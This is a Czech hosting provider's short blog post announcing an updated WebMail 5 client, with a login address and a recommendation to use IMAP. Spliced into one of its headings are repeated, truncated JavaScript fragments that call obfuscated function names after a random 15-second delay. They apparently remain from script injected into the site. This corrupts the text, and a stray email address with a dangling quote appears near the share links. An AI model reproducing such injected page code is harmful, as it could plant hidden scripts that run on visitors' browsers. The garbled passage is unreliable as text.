0

Nový a jednoduchý poštovní klient

Kategorie: Tipy

Drosera pro své klienty provedla update poštovního klienta WebMail verze 5. Nyní můžete pohodlně spravovat své emaily odkudkoliv. Přistup do administrace je http://webmail5.drosera.cz. Přihlašovací údaje zůstávají bez změny.

 

K čemu slouží WebMail?andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}


 WebMail je alternativní poštovní klient. Jediné, co k používání WebMailu potřebujete, je internetový prohlížeč. Díky tomu Vám umožňuje přístup k poště z jakéhokoliv místa, např. mimo kancelář, na dovolené a podobně. Využíváte-li WebMail pravidelně současně s klasickým poštovním klientem, doporučujeme používat protokol IMAP. Protokol snadno zajišťuje synchronizaci emailů. 

Neváhejte se na nás obrátit. Vždyť emaily řešíme každý den. Drosera chce, aby administrace byla pro vás co možná nejjednodušší.

Tweet about this on TwitterShare on FacebookEmail this to someone
lospapunos@seznam.cz'

Komentáře

Loading Facebook Comments ...

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

six − 2 =